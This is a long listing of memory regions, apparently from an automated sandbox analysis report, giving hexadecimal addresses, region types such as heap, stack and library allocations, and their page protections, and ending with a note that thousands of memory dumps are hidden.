page read and write
3441000
heap
page read and write
97D0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
360D000
heap
page read and write
9200000
trusted library allocation
page read and write
52F0000
heap
page read and write
9260000
trusted library allocation
page read and write
8450000
unkown
page read and write
29A1844C000
heap
page read and write
FB0000
trusted library allocation
page read and write
B1B0000
trusted library allocation
page read and write
339F000
heap
page read and write
4F42000
trusted library allocation
page read and write
8450000
unkown
page read and write
4E80000
heap
page read and write
9330000
trusted library allocation
page read and write
452F000
stack
page read and write
8450000
unkown
page read and write
1610526D000
heap
page read and write
8455000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
72E000
stack
page read and write
7630000
heap
page read and write
1FB4403D000
heap
page read and write
8FF0000
trusted library allocation
page read and write
8450000
unkown
page read and write
4C61000
heap
page read and write
77BA000
unkown
page read and write
9060000
trusted library allocation
page read and write
B280000
trusted library allocation
page read and write
F90000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
B010000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
7EF8000
trusted library allocation
page read and write
E5D000
stack
page read and write
1CB48B13000
heap
page read and write
92D0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
8455000
trusted library allocation
page read and write
94A3000
trusted library allocation
page read and write
52A1000
heap
page read and write
5A4F000
trusted library allocation
page read and write
A240000
trusted library allocation
page read and write
E2E000
heap
page read and write
9015000
trusted library allocation
page read and write
78B000
stack
page read and write
4E98000
heap
page read and write
4F16000
heap
page read and write
9040000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A3C0000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
9290000
unkown
page read and write
5B5F000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
16105140000
heap
page read and write
B080000
trusted library allocation
page read and write
254F8B70000
heap
page read and write
9500000
trusted library allocation
page read and write
9788000
trusted library allocation
page read and write
B080000
trusted library allocation
page read and write
91CE000
stack
page read and write
92F0000
trusted library allocation
page read and write
8300000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
A430000
trusted library allocation
page read and write
49AE000
stack
page read and write
8350000
trusted library allocation
page read and write
2BD632A0000
heap
page read and write
93C0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
35E0000
heap
page read and write
B180000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
8456000
trusted library allocation
page read and write
D10000
heap
page read and write
BE0000
heap
page read and write
97E0000
trusted library allocation
page execute and read and write
6F30000
direct allocation
page read and write
5100000
trusted library allocation
page read and write
3390000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
7F0F000
trusted library allocation
page read and write
94B7000
trusted library allocation
page read and write
9380000
unkown
page read and write
82E0000
trusted library allocation
page read and write
B030000
trusted library allocation
page read and write
9500000
trusted library allocation
page read and write
1FB43F80000
remote allocation
page read and write
B060000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
104E000
stack
page read and write
343F000
heap
page read and write
DB0567D000
stack
page read and write
9340000
trusted library allocation
page read and write
57AC000
trusted library allocation
page read and write
94D0000
trusted library allocation
page read and write
532E000
stack
page read and write
4413000
heap
page read and write
AF80000
trusted library allocation
page read and write
51B0000
direct allocation
page read and write
49A0000
heap
page read and write
9210000
trusted library allocation
page read and write
5610000
heap
page read and write
9490000
trusted library allocation
page read and write
5260000
heap
page read and write
5670000
trusted library allocation
page read and write
4E20000
direct allocation
page read and write
92D0000
trusted library allocation
page read and write
15F0000
heap
page read and write
1FB440B0000
heap
page read and write
1FB43E41000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
8458000
unkown
page read and write
94A0000
trusted library allocation
page read and write
9499000
trusted library allocation
page read and write
95AE000
trusted library allocation
page read and write
FF1000
trusted library allocation
page read and write
6F90000
heap
page read and write
45A0000
direct allocation
page read and write
8FF0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
BCF5000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
4BBE000
stack
page read and write
339E000
heap
page read and write
8459000
trusted library allocation
page read and write
B160000
trusted library allocation
page read and write
B065000
trusted library allocation
page read and write
5272000
heap
page read and write
4D60000
trusted library allocation
page read and write
5910000
heap
page read and write
9020000
trusted library allocation
page read and write
82F0000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
97AD000
trusted library allocation
page read and write
13565320000
unkown
page readonly
8455000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
5240000
heap
page read and write
7E0000
direct allocation
page execute and read and write
92F7000
trusted library allocation
page read and write
9315000
trusted library allocation
page read and write
C83E4F9000
stack
page read and write
8FF6000
trusted library allocation
page read and write
4FFA000
stack
page read and write
A420000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
1FB3E88E000
heap
page read and write
3520000
heap
page read and write
5076000
direct allocation
page read and write
93C0000
trusted library allocation
page read and write
4EFD000
heap
page read and write
8450000
unkown
page read and write
9490000
trusted library allocation
page read and write
564E000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
5227000
heap
page read and write
9200000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9770000
unkown
page read and write
93E0000
trusted library allocation
page read and write
7360000
trusted library allocation
page read and write
940000
trusted library allocation
page read and write
525E000
heap
page read and write
94A0000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
72B3000
trusted library allocation
page read and write
576D000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
9F0000
heap
page read and write
9330000
trusted library allocation
page read and write
2EF0000
remote allocation
page read and write
A460000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
59E3000
trusted library allocation
page read and write
343F000
heap
page read and write
93A0000
trusted library allocation
page read and write
4DD0000
heap
page read and write
8450000
unkown
page read and write
9020000
trusted library allocation
page read and write
4DE0000
direct allocation
page read and write
B1C0000
trusted library allocation
page read and write
D096FFF000
stack
page read and write
9520000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
92E5000
unkown
page read and write
92F5000
trusted library allocation
page read and write
57F0000
trusted library allocation
page read and write
8458000
unkown
page read and write
B040000
trusted library allocation
page read and write
9A0000
direct allocation
page execute and read and write
91F0000
trusted library allocation
page read and write
92E5000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
2D17F900000
heap
page read and write
92D0000
trusted library allocation
page read and write
2BD7000
heap
page read and write
59E4000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
4EDE000
stack
page read and write
254F8B78000
heap
page read and write
D3EF7FE000
stack
page read and write
93C0000
trusted library allocation
page read and write
309F000
stack
page read and write
8FF0000
trusted library allocation
page read and write
9763000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
8455000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
4BA0000
trusted library allocation
page read and write
A8BE000
stack
page read and write
9020000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
8450000
unkown
page read and write
9495000
trusted library allocation
page read and write
42D0000
trusted library allocation
page read and write
F90000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
92E000
stack
page read and write
9340000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
2EB0000
remote allocation
page read and write
20E29A6A000
heap
page read and write
97D0000
trusted library allocation
page read and write
2D17F813000
heap
page read and write
8457000
unkown
page read and write
97C0000
trusted library allocation
page read and write
4FF0000
trusted library allocation
page readonly
93E0000
trusted library allocation
page read and write
9370000
trusted library allocation
page read and write
96CE000
stack
page read and write
4BB0000
heap
page read and write
97A0000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
EB0000
unkown
page read and write
4F40000
trusted library allocation
page read and write
7F08000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9450000
unkown
page read and write
B040000
trusted library allocation
page read and write
AF60000
trusted library allocation
page execute and read and write
6F70000
trusted library allocation
page read and write
7B0000
remote allocation
page read and write
9360000
trusted library allocation
page read and write
92D0000
unkown
page read and write
1FB44000000
heap
page read and write
8420000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9273000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
1FB3F102000
heap
page read and write
9010000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
9591000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
44EE000
stack
page read and write
5F16F000
unkown
page readonly
A3C4000
trusted library allocation
page read and write
9208000
trusted library allocation
page read and write
B070000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
30C0000
heap
page read and write
9300000
trusted library allocation
page read and write
77B0000
unkown
page read and write
93D0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
29A18500000
heap
page read and write
8300000
trusted library allocation
page read and write
2FD0000
heap
page read and write
9300000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
BDAC000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
4EC3000
heap
page read and write
9520000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
729C000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
82D0000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
30C9000
heap
page read and write
29A1844D000
heap
page read and write
92D0000
trusted library allocation
page read and write
2D17F902000
heap
page read and write
5855000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
8450000
unkown
page read and write
400000
unkown
page readonly
97A0000
trusted library allocation
page read and write
4C9E000
stack
page read and write
2FE0000
trusted library allocation
page read and write
1B55D600000
heap
page read and write
92E0000
unkown
page read and write
92D0000
trusted library allocation
page read and write
9015000
unkown
page read and write
93D0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
4DF0000
trusted library section
page read and write
B040000
trusted library allocation
page read and write
8450000
unkown
page read and write
51FA000
heap
page read and write
A400000
trusted library allocation
page read and write
9216000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
48EF000
heap
page read and write
4DF1000
direct allocation
page read and write
4F38000
trusted library allocation
page read and write
93B0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
4B9F000
stack
page read and write
9450000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
96F000
stack
page read and write
9460000
trusted library allocation
page read and write
BEC3000
trusted library allocation
page read and write
9510000
trusted library allocation
page read and write
33DE000
stack
page read and write
2F2F000
stack
page read and write
3170000
trusted library allocation
page read and write
BE35000
trusted library allocation
page read and write
2D17F84D000
heap
page read and write
75D0000
trusted library allocation
page read and write
918B000
stack
page read and write
9520000
trusted library allocation
page read and write
A609000
trusted library allocation
page read and write
8300000
trusted library allocation
page read and write
B210000
trusted library allocation
page read and write
1FB3FC80000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
C2F3000
trusted library allocation
page read and write
4537000
unkown
page read and write
1CB48B00000
heap
page read and write
5262000
heap
page read and write
51A2000
direct allocation
page read and write
7ECC000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
1FB3E8FC000
heap
page read and write
20E29A00000
heap
page read and write
7E2C000
stack
page read and write
94A0000
trusted library allocation
page read and write
680000
heap
page read and write
93A0000
trusted library allocation
page read and write
2BD63270000
heap
page read and write
884000
heap
page read and write
523E000
stack
page read and write
96B0000
trusted library allocation
page read and write
684000
heap
page read and write
254F9890000
trusted library allocation
page read and write
6D82000
direct allocation
page read and write
A3F8000
trusted library allocation
page read and write
94A7000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
321E000
stack
page read and write
508F000
heap
page read and write
4950000
heap
page read and write
9000000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
77B4000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
124B000
heap
page read and write
9497000
trusted library allocation
page read and write
3350000
heap
page read and write
5100000
trusted library allocation
page read and write
2BB0000
heap
page read and write
9790000
trusted library allocation
page read and write
3540000
trusted library allocation
page read and write
8FF4000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
AABF000
stack
page read and write
2BD63090000
heap
page read and write
1B55D629000
heap
page read and write
8450000
unkown
page read and write
9510000
trusted library allocation
page execute and read and write
92F6000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
4FA0000
trusted library allocation
page read and write
5212000
heap
page read and write
94C0000
trusted library allocation
page read and write
1CB489C0000
heap
page read and write
9260000
trusted library allocation
page read and write
9776000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
2D17F6C0000
heap
page read and write
92F0000
trusted library allocation
page read and write
20E29B02000
heap
page read and write
8FF0000
trusted library allocation
page read and write
20E29A6A000
heap
page read and write
5070000
direct allocation
page read and write
9300000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
2F70000
remote allocation
page read and write
93E0000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
4E8D39F000
stack
page read and write
A97E000
stack
page read and write
1FB43F80000
remote allocation
page read and write
92D0000
trusted library allocation
page read and write
A9FD000
stack
page read and write
3300000
heap
page read and write
8450000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
9030000
unkown
page read and write
254F8AB0000
heap
page read and write
96A0000
trusted library allocation
page read and write
3370000
heap
page read and write
94E0000
trusted library allocation
page read and write
4D0E000
stack
page read and write
9330000
trusted library allocation
page read and write
1CB48A13000
heap
page read and write
B040000
trusted library allocation
page read and write
DF0000
heap
page read and write
5291000
heap
page read and write
B050000
trusted library allocation
page read and write
B010000
trusted library allocation
page read and write
93F0000
unkown
page read and write
20E29A50000
heap
page read and write
1FB3E8A0000
heap
page read and write
B040000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
6191000
trusted library allocation
page read and write
20E29B00000
heap
page read and write
9285000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
9633000
trusted library allocation
page read and write
AF80000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
492D000
stack
page read and write
FD0000
trusted library allocation
page read and write
5718000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
9015000
trusted library allocation
page read and write
95C3000
trusted library allocation
page read and write
1FB43E28000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
8459000
unkown
page read and write
94F0000
trusted library allocation
page read and write
50D0000
heap
page read and write
9780000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
3364000
heap
page read and write
9760000
trusted library allocation
page read and write
29A18300000
heap
page read and write
91F0000
trusted library allocation
page read and write
91F0000
unkown
page read and write
301C000
stack
page read and write
9330000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
4F52000
trusted library allocation
page read and write
1FB3F000000
heap
page read and write
AF90000
trusted library allocation
page read and write
16105228000
heap
page read and write
93C5000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
4DC1000
direct allocation
page read and write
8450000
unkown
page read and write
AFFE000
stack
page read and write
9750000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
49F0000
remote allocation
page read and write
9200000
trusted library allocation
page read and write
42C0000
direct allocation
page read and write
DB05477000
stack
page read and write
82C0000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
5130000
direct allocation
page read and write
9484000
trusted library allocation
page read and write
4402000
unkown
page read and write
9520000
trusted library allocation
page read and write
884000
heap
page read and write
8FF7000
trusted library allocation
page read and write
4BA000
heap
page read and write
9040000
trusted library allocation
page read and write
2BD63281000
heap
page read and write
94A0000
trusted library allocation
page read and write
B050000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
207B57B000
stack
page read and write
8450000
trusted library allocation
page read and write
5088000
trusted library allocation
page read and write
2F0D000
stack
page read and write
4CFC000
stack
page read and write
8450000
trusted library allocation
page read and write
B090000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
B090000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
C3DC000
trusted library allocation
page read and write
9462000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
4CB000
stack
page read and write
93A0000
trusted library allocation
page read and write
4FEB000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
2D17F878000
heap
page read and write
1CB48A67000
heap
page read and write
96F0000
trusted library allocation
page read and write
5259000
heap
page read and write
401000
unkown
page execute read
9600000
trusted library allocation
page read and write
5286000
heap
page read and write
6D70000
direct allocation
page read and write
93C0000
trusted library allocation
page execute and read and write
8450000
unkown
page read and write
9300000
trusted library allocation
page read and write
1FB43E64000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
7510000
trusted library allocation
page read and write
5110000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
620000
heap
page read and write
A3E0000
trusted library allocation
page read and write
20E29A4B000
heap
page read and write
5191000
trusted library allocation
page read and write
4EDC000
heap
page read and write
92D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
8B0000
heap
page read and write
9490000
trusted library allocation
page read and write
135651EE000
heap
page read and write
8D7000
heap
page read and write
51CA000
trusted library allocation
page read and write
8458000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
503E000
stack
page read and write
77B0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
91F5000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
930F000
stack
page read and write
D89000
heap
page read and write
5218000
heap
page read and write
794000
heap
page read and write
D20000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
1CB48A00000
heap
page read and write
342947E000
stack
page read and write
8FF7000
trusted library allocation
page read and write
329F000
stack
page read and write
AA3E000
stack
page read and write
2BFC000
stack
page read and write
8450000
trusted library allocation
page read and write
A3E0000
trusted library allocation
page read and write
3190000
heap
page read and write
334E000
stack
page read and write
7E84000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
1FB3E829000
heap
page read and write
7B0000
direct allocation
page execute and read and write
94D0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
5296000
heap
page read and write
1FB3E894000
heap
page read and write
B0A0000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
97D4000
trusted library allocation
page read and write
9560000
unkown
page read and write
29A18452000
heap
page read and write
7240000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
9266000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
16105276000
heap
page read and write
49F0000
remote allocation
page read and write
5060000
trusted library allocation
page read and write
33C0000
heap
page read and write
1FB3F113000
heap
page read and write
9380000
trusted library allocation
page read and write
9500000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
3390000
trusted library allocation
page read and write
FC0000
trusted library allocation
page read and write
C07B000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
515F000
stack
page read and write
9300000
unkown
page read and write
B060000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9265000
trusted library allocation
page read and write
4BC1000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
A3D0000
trusted library allocation
page read and write
2D80000
unkown
page readonly
9530000
trusted library allocation
page read and write
9060000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
AF80000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
810000
heap
page read and write
9790000
trusted library allocation
page read and write
9500000
trusted library allocation
page read and write
2ED0000
heap
page read and write
EB0000
unkown
page read and write
92F0000
trusted library allocation
page read and write
84379E000
unkown
page read and write
A400000
trusted library allocation
page read and write
4F2B000
trusted library allocation
page read and write
4F46000
trusted library allocation
page read and write
5080000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
95F0000
unkown
page read and write
B040000
trusted library allocation
page read and write
93A0000
trusted library allocation
page execute and read and write
9060000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
1FB3E857000
heap
page read and write
93B0000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
A440000
trusted library allocation
page execute and read and write
9300000
trusted library allocation
page read and write
2BD6323C000
heap
page read and write
4F8F000
trusted library allocation
page read and write
8458000
unkown
page read and write
5110000
trusted library allocation
page read and write
4F46000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
453A000
unkown
page readonly
840F000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
1CB48A67000
heap
page read and write
92D0000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
9010000
unkown
page read and write
9790000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
E1F000
heap
page read and write
9010000
trusted library allocation
page read and write
43B000
stack
page read and write
16105255000
heap
page read and write
9530000
trusted library allocation
page read and write
884000
heap
page read and write
C35C000
trusted library allocation
page read and write
EA0000
unkown
page readonly
74B1000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
51E0000
direct allocation
page read and write
92D0000
trusted library allocation
page read and write
2D17F7C0000
trusted library allocation
page read and write
FD0000
trusted library section
page read and write
254F8BB6000
heap
page read and write
1FB3F910000
trusted library section
page readonly
5209000
heap
page read and write
9020000
trusted library allocation
page read and write
D17000
heap
page read and write
5030000
direct allocation
page read and write
8450000
trusted library allocation
page read and write
33B2000
heap
page read and write
A400000
trusted library allocation
page read and write
8450000
unkown
page read and write
9410000
unkown
page read and write
3371000
heap
page read and write
92C0000
unkown
page read and write
B040000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
5295000
heap
page read and write
525C000
heap
page read and write
9490000
trusted library allocation
page read and write
5194000
direct allocation
page read and write
598F000
stack
page read and write
3428FFB000
stack
page read and write
92F0000
trusted library allocation
page read and write
51A1000
direct allocation
page read and write
8450000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
5160000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
794000
heap
page read and write
846E000
trusted library allocation
page read and write
B1A0000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
98F000
stack
page read and write
9340000
trusted library allocation
page read and write
93C5000
trusted library allocation
page read and write
4410000
heap
page read and write
9490000
trusted library allocation
page read and write
BF0000
unkown
page readonly
50E4000
trusted library allocation
page read and write
515C000
stack
page read and write
4DE2000
direct allocation
page read and write
4C61000
heap
page read and write
9020000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
95A0000
trusted library allocation
page read and write
1FB43F80000
remote allocation
page read and write
8300000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
4F4B000
trusted library allocation
page execute and read and write
35C0000
trusted library allocation
page read and write
2E9C000
stack
page read and write
9040000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
2FB0000
remote allocation
page read and write
93C0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
8450000
unkown
page read and write
5251000
heap
page read and write
3520000
heap
page read and write
135656E0000
unkown
page readonly
520B000
heap
page read and write
4BF9000
stack
page read and write
5180000
heap
page read and write
97D0000
trusted library allocation
page read and write
92B0000
unkown
page read and write
2D17F884000
heap
page read and write
57DF000
trusted library allocation
page read and write
77B5000
trusted library allocation
page read and write
16105213000
heap
page read and write
8455000
trusted library allocation
page read and write
9790000
trusted library allocation
page execute and read and write
67E000
stack
page read and write
72B0000
trusted library allocation
page read and write
254F9B60000
trusted library allocation
page read and write
325E000
stack
page read and write
538F000
stack
page read and write
161050D0000
heap
page read and write
9330000
trusted library allocation
page read and write
AA7E000
stack
page read and write
AF30000
trusted library allocation
page read and write
13565340000
heap
page read and write
944E000
stack
page read and write
C0B6000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
29A18448000
heap
page read and write
92F0000
trusted library allocation
page read and write
D09698E000
stack
page read and write
5221000
trusted library allocation
page read and write
4930000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
32B6000
heap
page read and write
7EDA000
trusted library allocation
page read and write
3600000
heap
page read and write
4670000
heap
page read and write
1610527A000
heap
page read and write
9370000
trusted library allocation
page read and write
8FF8000
unkown
page read and write
FD0000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
4F16000
heap
page read and write
580F000
trusted library allocation
page read and write
1FB3E813000
heap
page read and write
A400000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
C3B9000
trusted library allocation
page read and write
582D000
trusted library allocation
page read and write
82F0000
trusted library allocation
page read and write
7E30000
trusted library allocation
page read and write
B040000
trusted library allocation
page read and write
5263000
heap
page read and write
9020000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
1B55D63D000
heap
page read and write
B090000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
2FB0000
remote allocation
page read and write
95B0000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
4E3D000
stack
page read and write
4DB0000
heap
page read and write
93C0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
BF0000
unkown
page readonly
5255000
heap
page read and write
190000
heap
page read and write
9260000
trusted library allocation
page read and write
9650000
unkown
page read and write
A216000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
7E38000
trusted library allocation
page read and write
B1D0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
1FB3F7E0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
7370000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
44AF000
stack
page read and write
51A6000
direct allocation
page read and write
97D0000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
49C0000
direct allocation
page execute and read and write
8450000
unkown
page read and write
82D0000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
8450000
trusted library allocation
page read and write
9448000
trusted library allocation
page read and write
58F4000
direct allocation
page read and write
9810000
trusted library allocation
page read and write
There are 3274 hidden memdumps, click here to show them.